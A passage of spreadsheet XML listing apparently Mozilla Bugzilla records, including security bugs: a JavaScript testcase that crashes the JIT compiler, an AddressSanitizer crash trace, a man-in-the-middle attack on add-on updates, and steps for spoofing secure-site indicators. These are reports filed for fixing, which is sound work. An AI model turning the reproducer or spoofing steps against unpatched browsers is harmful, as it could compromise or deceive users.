      </c>
      <c r="D5930" t="inlineStr">
        <is>
          <t>2020-08-08 09:37:18 -0700</t>
        </is>
      </c>
      <c r="E5930" t="n">
        <v>1</v>
      </c>
      <c r="F5930" t="n">
        <v>1</v>
      </c>
      <c r="G5930" t="n">
        <v>3</v>
      </c>
      <c r="H5930" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5930" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5930" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K5930" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5930" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5930" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5930" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5930" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5930" t="inlineStr">
        <is>
          <t>[bugmon:update,bisect][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5930" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5930" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5930" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T5930" t="n">
        <v>1</v>
      </c>
      <c r="U5930" t="n">
        <v>0</v>
      </c>
      <c r="V5930" t="n">
        <v>13</v>
      </c>
      <c r="W5930" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 20200310-c7766d0b4a12 (build with (buildFlags not available), run with --fuzzing-safe --ion-offthread-compile=off --ion-full-warmup-threshold=0 --baseline-eager):
    for (const name of [])
      for (let eval of [eval,eval]) {}
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    #0  0x00005555566ef2d0 in js::jit::TypeSetIncludes(js::TypeSet*, js::jit::MIRType, js::TypeSet*) ()
    #1  0x00005555566130e1 in js::jit::IonBuilder::initArrayElemTryFastPath(bool*, js::jit::MDefinition*, js::jit::MDefinition*, js::jit::MDefinition*) ()
    #2  0x0000555556612e04 in js::jit::IonBuilder::initArrayElement(js::jit::MDefinition*, js::jit::MDefinition*, js::jit::MDefinition*) ()
    #3  0x00005555565ee83f in js::jit::IonBuilder::jsop_initelem_array() ()
    #4  0x00005555565e2fd7 in js::jit::IonBuilder::inspectOpcode(JSOp, bool*) ()
    #5  0x00005555565de964 in js::jit::IonBuilder::traverseBytecode() ()
    #6  0x00005555565d6106 in js::jit::IonBuilder::build() ()
    #7  0x00005555565ca97c in js::jit::Compile(JSContext*, JS::Handle&lt;JSScript*&gt;, js::jit::BaselineFrame*, unsigned int, unsigned char*, bool) ()
    #8  0x00005555565cbb5f in IonCompileScriptForBaseline(JSContext*, js::jit::BaselineFrame*, unsigned int, unsigned char*) ()
    #9  0x00005555565cc12d in js::jit::IonCompileScriptForBaselineOSR(JSContext*, js::jit::BaselineFrame*, unsigned int, unsigned char*, js::jit::IonOsrTempData**) ()
    #10 0x00003a567003e587 in ?? ()
    #11 0x00007fffffffbb68 in ?? ()
    #12 0x00007fffffffbad0 in ?? ()
    #13 0x0000000000000000 in ?? ()
    rax	0x555556f9f374	93825019802484
    rbx	0x7ffff4c2e460	140737299801184
    rcx	0x555557efe850	93825035921488
    rdx	0x0	0
    rsi	0x7ffff6efd770	140737336301424
    rdi	0x7ffff6efc540	140737336296768
    rbp	0x7fffffffb0a0	140737488335008
    rsp	0x7fffffffb0a0	140737488335008
    r8	0x7ffff6efd770	140737336301424
    r9	0x7ffff7f9cd00	140737353731328
    r10	0x58	88
    r11	0x7ffff6ba47a0	140737332791200
    r12	0x7fffffffb127	140737488335143
    r13	0x7fffffffb4c0	140737488336064
    r14	0x7ffff4c2e2d0	140737299800784
    r15	0x10000	65536
    rip	0x5555566ef2d0 &lt;js::jit::TypeSetIncludes(js::TypeSet*, js::jit::MIRType, js::TypeSet*)+256&gt;
    =&gt; 0x5555566ef2d0 &lt;_ZN2js3jit15TypeSetIncludesEPNS_7TypeSetENS0_7MIRTypeES2_+256&gt;:	movl   $0x8d7,0x0
       0x5555566ef2db &lt;_ZN2js3jit15TypeSetIncludesEPNS_7TypeSetENS0_7MIRTypeES2_+267&gt;:	callq  0x5555557eef2e &lt;abort&gt;
MIR assertion, marking s-s until triaged.</t>
        </is>
      </c>
      <c r="X5930" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5931">
      <c r="A5931" t="n">
        <v>1117564</v>
      </c>
      <c r="B5931" t="inlineStr">
        <is>
          <t>2015-01-04 10:14:44 -0800</t>
        </is>
      </c>
      <c r="C5931" t="inlineStr">
        <is>
          <t>Linkify bug numbers in the exclusion profile descriptions</t>
        </is>
      </c>
      <c r="D5931" t="inlineStr">
        <is>
          <t>2016-06-16 01:02:29 -0700</t>
        </is>
      </c>
      <c r="E5931" t="n">
        <v>1</v>
      </c>
      <c r="F5931" t="n">
        <v>1</v>
      </c>
      <c r="G5931" t="n">
        <v>7</v>
      </c>
      <c r="H5931" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5931" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5931" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5931" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5931" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5931" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5931" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5931" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5931" t="inlineStr"/>
      <c r="Q5931" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R5931" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5931" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5931" t="n">
        <v>1</v>
      </c>
      <c r="U5931" t="n">
        <v>0</v>
      </c>
      <c r="V5931" t="n">
        <v>5</v>
      </c>
      <c r="W5931" t="inlineStr">
        <is>
          <t>To make it quicker to find out the reason for a job being hidden, since the description/reason is often just a bug number.</t>
        </is>
      </c>
      <c r="X5931" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5932">
      <c r="A5932" t="n">
        <v>1054538</v>
      </c>
      <c r="B5932" t="inlineStr">
        <is>
          <t>2014-08-15 15:07:47 -0700</t>
        </is>
      </c>
      <c r="C5932" t="inlineStr">
        <is>
          <t>Crash [@ interpExitTrampoline] with js::jit::IonScript::unlinkFromRuntime and GC on the stack</t>
        </is>
      </c>
      <c r="D5932" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:07 -0700</t>
        </is>
      </c>
      <c r="E5932" t="n">
        <v>1</v>
      </c>
      <c r="F5932" t="n">
        <v>1</v>
      </c>
      <c r="G5932" t="n">
        <v>3</v>
      </c>
      <c r="H5932" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5932" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5932" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K5932" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5932" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5932" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5932" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5932" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5932" t="inlineStr">
        <is>
          <t>[adv-main35+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q5932" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5932" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5932" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T5932" t="n">
        <v>1</v>
      </c>
      <c r="U5932" t="n">
        <v>0</v>
      </c>
      <c r="V5932" t="n">
        <v>23</v>
      </c>
      <c r="W5932" t="inlineStr">
        <is>
          <t>Created attachment 8473932
stack
On m-c rev 9fdb8047f07d, there is an unreproducible crash (but with a crash dump).
My configure flags are:
AR=ar sh /home/gkwong/trees/mozilla-central/js/src/configure --disable-debug --enable-optimize --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe
I'll be sending the files to Terrence and :jonco to look at.</t>
        </is>
      </c>
      <c r="X5932" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5933">
      <c r="A5933" t="n">
        <v>932833</v>
      </c>
      <c r="B5933" t="inlineStr">
        <is>
          <t>2013-10-30 09:06:39 -0700</t>
        </is>
      </c>
      <c r="C5933" t="inlineStr">
        <is>
          <t>[Settings] 1.3 Visual Refresh of Settings icons</t>
        </is>
      </c>
      <c r="D5933" t="inlineStr">
        <is>
          <t>2013-11-28 17:03:23 -0800</t>
        </is>
      </c>
      <c r="E5933" t="n">
        <v>1</v>
      </c>
      <c r="F5933" t="n">
        <v>1</v>
      </c>
      <c r="G5933" t="n">
        <v>6</v>
      </c>
      <c r="H5933" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5933" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J5933" t="inlineStr">
        <is>
          <t>Gaia::Settings</t>
        </is>
      </c>
      <c r="K5933" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5933" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5933" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N5933" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5933" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5933" t="inlineStr">
        <is>
          <t>visual design, visual-tracking, jian</t>
        </is>
      </c>
      <c r="Q5933" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5933" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5933" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5933" t="n">
        <v>1</v>
      </c>
      <c r="U5933" t="n">
        <v>0</v>
      </c>
      <c r="V5933" t="n">
        <v>23</v>
      </c>
      <c r="W5933" t="inlineStr">
        <is>
          <t>A refresh of some of the settings icons for 1.3.</t>
        </is>
      </c>
      <c r="X5933" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5934">
      <c r="A5934" t="n">
        <v>1303418</v>
      </c>
      <c r="B5934" t="inlineStr">
        <is>
          <t>2016-09-16 11:46:20 -0700</t>
        </is>
      </c>
      <c r="C5934" t="inlineStr">
        <is>
          <t>Addons update must verify IDs match between current and update versions</t>
        </is>
      </c>
      <c r="D5934" t="inlineStr">
        <is>
          <t>2024-08-08 06:56:58 -0700</t>
        </is>
      </c>
      <c r="E5934" t="n">
        <v>1</v>
      </c>
      <c r="F5934" t="n">
        <v>1</v>
      </c>
      <c r="G5934" t="n">
        <v>3</v>
      </c>
      <c r="H5934" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5934" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5934" t="inlineStr">
        <is>
          <t>Add-ons Manager</t>
        </is>
      </c>
      <c r="K5934" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5934" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5934" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5934" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5934" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5934" t="inlineStr">
        <is>
          <t>[adv-main50+][adv-esr45.5+] triaged</t>
        </is>
      </c>
      <c r="Q5934" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5934" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5934" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T5934" t="n">
        <v>1</v>
      </c>
      <c r="U5934" t="n">
        <v>0</v>
      </c>
      <c r="V5934" t="n">
        <v>45</v>
      </c>
      <c r="W5934" t="inlineStr">
        <is>
          <t>@movrcx reported [1] a vulnerability in the addons update process that allows a Man-In-The-Middle attack to replace an installed addon with a fraudulent version. The attacker needs to first obtain a valid signature for a fraudulent addon, which can be done without review, then hijack the call between the user and AMO to replace the response from /update/VersionCheck.php with the IDs of the fraudulent addon.
This attack works because Firefox does not currently verify that the updated addon ID matches the installed addon ID. Adding this check will require the attacker to break into the AMO service or steal the developer access to AMO to sign a fraudulent addon with the same IDs as the target addon.
The ID verification should be implemented in Firefox.
[1] https://hackernoon.com/tor-browser-exposed-anti-privacy-implantation-at-mass-scale-bd68e9eb1e95#.ey0pm84bd</t>
        </is>
      </c>
      <c r="X5934" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5935">
      <c r="A5935" t="n">
        <v>826104</v>
      </c>
      <c r="B5935" t="inlineStr">
        <is>
          <t>2013-01-02 15:47:57 -0800</t>
        </is>
      </c>
      <c r="C5935" t="inlineStr">
        <is>
          <t>Crash in MediaDecoder::UpdatePlaybackOffset</t>
        </is>
      </c>
      <c r="D5935" t="inlineStr">
        <is>
          <t>2020-05-27 00:13:38 -0700</t>
        </is>
      </c>
      <c r="E5935" t="n">
        <v>1</v>
      </c>
      <c r="F5935" t="n">
        <v>1</v>
      </c>
      <c r="G5935" t="n">
        <v>3</v>
      </c>
      <c r="H5935" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5935" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5935" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5935" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5935" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5935" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5935" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5935" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5935" t="inlineStr">
        <is>
          <t>[asan][adv-main21+]</t>
        </is>
      </c>
      <c r="Q5935" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5935" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5935" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T5935" t="n">
        <v>1</v>
      </c>
      <c r="U5935" t="n">
        <v>0</v>
      </c>
      <c r="V5935" t="n">
        <v>9</v>
      </c>
      <c r="W5935" t="inlineStr">
        <is>
          <t>This was surfaced after bug #784918 was fixed. Use Abhishek's sample file for that bug to reproduce this one.
Also, if bug does not reproduce at first, try loading in several tabs at once and refreshing page.
=================================================================
==87236== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000105579b20 sp 0x000190549fe0 bp 0x00019054a0d0 T409)
AddressSanitizer can not provide additional info.
    #0 0x105579b1f in mozilla::MediaDecoder::UpdatePlaybackOffset(long long) (in XUL) + 175
    #1 0x105588d42 in mozilla::MediaDecoderStateMachine::PlayFromAudioQueue(unsigned long long, unsigned int) (in XUL) + 1394
    #2 0x1055877be in mozilla::MediaDecoderStateMachine::AudioLoop() (in XUL) + 4238
    #3 0x105594239 in nsRunnableMethodImpl&lt;void (mozilla::MediaDecoderStateMachine::*)(), true&gt;::Run() (in XUL) + 137
    #4 0x1069c2f4b in nsThread::ProcessNextEvent(bool, bool*) (in XUL) + 2139
    #5 0x106909a72 in NS_ProcessNextEvent_P(nsIThread*, bool) (in XUL) + 194
    #6 0x1069c122c in nsThread::ThreadFunc(void*) (in XUL) + 412
    #7 0x103258f1d in _pt_root (in libnspr4.dylib) + 749
    #8 0x1000113ea in 0x2000113ea
    #9 0x7fff913be180 in thread_start (in libsystem_c.dylib) + 12
Thread T409 created by T28 here:
    #0 0x1000090b4 in 0x2000090b4
    #1 0x1032548bc in _PR_CreateThread (in libnspr4.dylib) + 1612
    #2 0x10325425a in PR_CreateThread (in libnspr4.dylib) + 26
    #3 0x1069c1c67 in nsThread::Init() (in XUL) + 327
    #4 0x1069c6717 in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) (in XUL) + 119
    #5 0x106909267 in NS_NewThread_P(nsIThread**, nsIRunnable*, unsigned int) (in XUL) + 199
    #6 0x1051b1ecc in tag_nsresult NS_NewNamedThread_P&lt;12ul&gt;(char const (&amp;) [12ul], nsIThread**, nsIRunnable*, unsigned int) (in XUL) + 28
    #7 0x105589dab in mozilla::MediaDecoderStateMachine::StartAudioThread() (in XUL) + 539
    #8 0x105589ada in mozilla::MediaDecoderStateMachine::StartPlayback() (in XUL) + 474
    #9 0x10558f5f5 in mozilla::MediaDecoderStateMachine::AdvanceFrame() (in XUL) + 2405
    #10 0x10558deac in mozilla::MediaDecoderStateMachine::RunStateMachine() (in XUL) + 492
    #11 0x105590f2d in mozilla::MediaDecoderStateMachine::CallRunStateMachine() (in XUL) + 541
    #12 0x105590cb7 in mozilla::MediaDecoderStateMachine::Run() (in XUL) + 231
    #13 0x1069c2f4b in nsThread::ProcessNextEvent(bool, bool*) (in XUL) + 2139
    #14 0x106909a72 in NS_ProcessNextEvent_P(nsIThread*, bool) (in XUL) + 194
    #15 0x1069c243c in nsThread::Shutdown() (in XUL) + 764
    #16 0x10558c8ff in mozilla::MediaDecoderStateMachine::StopAudioThread() (in XUL) + 655
    #17 0x105590ea5 in mozilla::MediaDecoderStateMachine::CallRunStateMachine() (in XUL) + 405
    #18 0x105590cb7 in mozilla::MediaDecoderStateMachine::Run() (in XUL) + 231
    #19 0x1069c2f4b in nsThread::ProcessNextEvent(bool, bool*) (in XUL) + 2139
    #20 0x106909a72 in NS_ProcessNextEvent_P(nsIThread*, bool) (in XUL) + 194
    #21 0x1069c122c in nsThread::ThreadFunc(void*) (in XUL) + 412
    #22 0x103258f1d in _pt_root (in libnspr4.dylib) + 749
    #23 0x1000113ea in 0x2000113ea
    #24 0x7fff913be180 in thread_start (in libsystem_c.dylib) + 12
Thread T28 created by T0 here:
    #0 0x1000090b4 in 0x2000090b4
    #1 0x1032548bc in _PR_CreateThread (in libnspr4.dylib) + 1612
    #2 0x10325425a in PR_CreateThread (in libnspr4.dylib) + 26
    #3 0x1069c1c67 in nsThread::Init() (in XUL) + 327
    #4 0x1069c6717 in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) (in XUL) + 119
    #5 0x106909267 in NS_NewThread_P(nsIThread**, nsIRunnable*, unsigned int) (in XUL) + 199
    #6 0x1051b1ecc in tag_nsresult NS_NewNamedThread_P&lt;12ul&gt;(char const (&amp;) [12ul], nsIThread**, nsIRunnable*, unsigned int) (in XUL) + 28
    #7 0x10557e344 in mozilla::StateMachineTracker::EnsureGlobalStateMachine() (in XUL) + 356
    #8 0x10557fb6d in mozilla::MediaDecoderStateMachine::MediaDecoderStateMachine(mozilla::MediaDecoder*, mozilla::MediaDecoderReader*, bool) (in XUL) + 1821
    #9 0x1055fd6f2 in mozilla::WaveDecoder::CreateStateMachine() (in XUL) + 66
    #10 0x1055726c6 in mozilla::MediaDecoder::Load(mozilla::MediaResource*, nsIStreamListener**, mozilla::MediaDecoder*) (in XUL) + 134
    #11 0x104db717f in nsHTMLMediaElement::FinishDecoderSetup(mozilla::MediaDecoder*, mozilla::MediaResource*, nsIStreamListener**, mozilla::MediaDecoder*) (in XUL) + 943
    #12 0x104da857f in nsHTMLMediaElement::InitializeDecoderForChannel(nsIChannel*, nsIStreamListener**) (in XUL) + 719
    #13 0x104da7ee4 in nsHTMLMediaElement::MediaLoadListener::OnStartRequest(nsIRequest*, nsISupports*) (in XUL) + 1380
    #14 0x103c2301f in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) (in XUL) + 495
    #15 0x103c4ad53 in nsInputStreamPump::OnStateStart() (in XUL) + 515
    #16 0x103c4a8e2 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) (in XUL) + 530
    #17 0x106989e0d in nsInputStreamReadyEvent::Run() (in XUL) + 125
    #18 0x1069c2f4b in nsThread::ProcessNextEvent(bool, bool*) (in XUL) + 2139
    #19 0x1069098ae in NS_ProcessPendingEvents_P(nsIThread*, unsigned int) (in XUL) + 254
    #20 0x1061a6813 in nsBaseAppShell::NativeEventCallback() (in XUL) + 451
    #21 0x1061266ca in nsAppShell::ProcessGeckoEvents(void*) (in XUL) + 490
    #22 0x7fff96815100 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (in CoreFoundation) + 16
    #23 0x7fff96814a24 in __CFRunLoopDoSources0 (in CoreFoundation) + 244
    #24 0x7fff96837dc4 in __CFRunLoopRun (in CoreFoundation) + 788
    #25 0x7fff968376b1 in CFRunLoopRunSpecific (in CoreFoundation) + 289
    #26 0x7fff901db0a3 in RunCurrentEventLoopInMode (in HIToolbox) + 208
    #27 0x7fff901dad83 in ReceiveNextEventCommon (in HIToolbox) + 165
    #28 0x7fff901dacd2 in BlockUntilNextEventMatchingListInMode (in HIToolbox) + 61
    #29 0x7fff924d8612 in _DPSNextEvent (in AppKit) + 684
    #30 0x7fff924d7ed1 in -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] (in AppKit) + 127
    #31 0x106124f15 in -[GeckoNSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] (in XUL) + 245
    #32 0x7fff924cf282 in -[NSApplication run] (in AppKit) + 516
    #33 0x1061272a9 in nsAppShell::Run() (in XUL) + 185
    #34 0x105d028c7 in nsAppStartup::Run() (in XUL) + 311
    #35 0x103bc674f in XREMain::XRE_mainRun() (in XUL) + 4287
    #36 0x103bc7707 in XREMain::XRE_main(int, char**, nsXREAppData const*) (in XUL) + 599
    #37 0x103bc7bb2 in XRE_main (in XUL) + 146
    #38 0x100002d50 in 0x200002d50
    #39 0x1000023fa in 0x2000023fa
    #40 0x100001853 in 0x200001853
    #41 0x0 in 0x0000000100000000 (in firefox-bin)
Stats: 1909M malloced (1465M for red zones) by 2527360 calls
Stats: 260M realloced by 160538 calls
Stats: 1785M freed by 2116352 calls
Stats: 1741M really freed by 2026212 calls
Stats: 703M (180003 full pages) mmaped in 1041 calls
  mmaps   by size class: 7:356265; 8:124867; 9:27621; 10:13797; 11:9180; 12:4480; 13:11648; 14:3200; 15:800; 16:1160; 17:464; 18:148; 19:38; 20:29; 21:5; 22:23; 23:2; 24:4;
  mallocs by size class: 7:1596497; 8:494426; 9:131434; 10:117840; 11:84623; 12:32593; 13:33559; 14:13390; 15:12108; 16:5815; 17:3815; 18:874; 19:165; 20:120; 21:14; 22:80; 23:2; 24:7;
  frees   by size class: 7:1318903; 8:396513; 9:113833; 10:109720; 11:81490; 12:29796; 13:32710; 14:11321; 15:11885; 16:5314; 17:3744; 18:760; 19:155; 20:116; 21:13; 22:73; 23:2; 24:7;
  rfrees  by size class: 7:1258696; 8:381608; 9:109079; 10:106352; 11:78281; 12:28656; 13:31792; 14:10212; 15:11507; 16:5240; 17:3698; 18:726; 19:154; 20:116; 21:13; 22:73; 23:2; 24:7;
Stats: malloc large: 24019 small slow: 41712
==87236== ABORTING</t>
        </is>
      </c>
      <c r="X5935" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5936">
      <c r="A5936" t="n">
        <v>258048</v>
      </c>
      <c r="B5936" t="inlineStr">
        <is>
          <t>2004-09-04 14:49:34 -0700</t>
        </is>
      </c>
      <c r="C5936" t="inlineStr">
        <is>
          <t>Security indicators updated when page finishes load, not when it starts rendering</t>
        </is>
      </c>
      <c r="D5936" t="inlineStr">
        <is>
          <t>2006-03-12 17:56:53 -0800</t>
        </is>
      </c>
      <c r="E5936" t="n">
        <v>1</v>
      </c>
      <c r="F5936" t="n">
        <v>1</v>
      </c>
      <c r="G5936" t="n">
        <v>3</v>
      </c>
      <c r="H5936" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5936" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5936" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5936" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5936" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5936" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5936" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5936" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5936" t="inlineStr">
        <is>
          <t>[sg:fix] need landing</t>
        </is>
      </c>
      <c r="Q5936" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5936" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5936" t="inlineStr">
        <is>
          <t>mozilla1.8beta1</t>
        </is>
      </c>
      <c r="T5936" t="n">
        <v>1</v>
      </c>
      <c r="U5936" t="n">
        <v>0</v>
      </c>
      <c r="V5936" t="n">
        <v>18</v>
      </c>
      <c r="W5936" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20040903 Firefox/1.0 PR (NOT FINAL)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20040903 Firefox/1.0 PR (NOT FINAL)
When loading a secure page, the security indicates (lock in status bar, yellow
address bar for Firefox) is only changed when the page is completely loaded.  It
may be possible to pretend a site is secure (and, in the case of Firefox, the
domain in the status bar is not updated).
Reproducible: Always
Steps to Reproduce:
1. Go to a secure site
2. Go to a non-secure site that loads slowly
Actual Results:  
All indicators of secure site are kept until the non-secure site finishes
loading, after any page content has been rendered
Expected Results:  
The secure site inidicators are removed when any page rendering begins (and,
possibly, restored after it finishes if the new site is also secure)
It may be possible to spoof a secure site by:
1. Opening a window to the secure site's login page via script
2. Wait for the site to load (via timeouts?  Can't seem to do it via event
handlers, which is good)
3. Open a non-secure site in the same window (via script).  Spoofs the first
document.
4. Make sure the second page never finishes loading (possibly via an hidden
image with the download being throttled by the server).
To the user, all indications are that the second page is secure - and, excluding
the address, also indicates that the second document is on the domain of the
first document.
Proposed fix: Clear the security indicators when page starts loading.
(Sorry if this is a dupe - can't seem to find a dupe)
Tested on
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20040903
Firefox/1.0 PR (NOT FINAL)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.1) Gecko/20040707
(Seamonkey 1.7.1)</t>
        </is>
      </c>
      <c r="X5936" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5937">
      <c r="A5937" t="n">
        <v>565474</v>
      </c>
      <c r="B5937" t="inlineStr">
        <is>
          <t>2010-05-12 15:10:19 -0700</t>
        </is>
      </c>
      <c r="C5937" t="inlineStr">
        <is>
          <t>Rewrite for Kitsune questions app</t>
        </is>
      </c>
      <c r="D5937" t="inlineStr">
        <is>
          <t>2010-08-02 12:17:44 -0700</t>
        </is>
      </c>
      <c r="E5937" t="n">
        <v>1</v>
      </c>
      <c r="F5937" t="n">
        <v>1</v>
      </c>
      <c r="G5937" t="n">
        <v>5</v>
      </c>
      <c r="H5937" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5937" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5937" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K5937" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5937" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5937" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5937" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5937" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5937" t="inlineStr"/>
      <c r="Q5937" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5937" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5937" t="inlineStr">
        <is>
          <t>1.5.6</t>
        </is>
      </c>
      <c r="T5937" t="n">
        <v>1</v>
      </c>
      <c r="U5937" t="n">
        <v>0</v>
      </c>
      <c r="V5937" t="n">
        <v>4</v>
      </c>
      <c r="W5937" t="inlineStr">
        <is>
          <t>This should do it:
# Rewrite question URLs to Kitsune
RewriteRule ^questions(.*) /k/questions$1 [L,QSA]
RewriteRule ^([\-a-zA-Z]+)/questions(.*) /k/$1/questions$2 [L,QSA]
The URL "questions" felt a little more clear and a little less redundant than "support".</t>
        </is>
      </c>
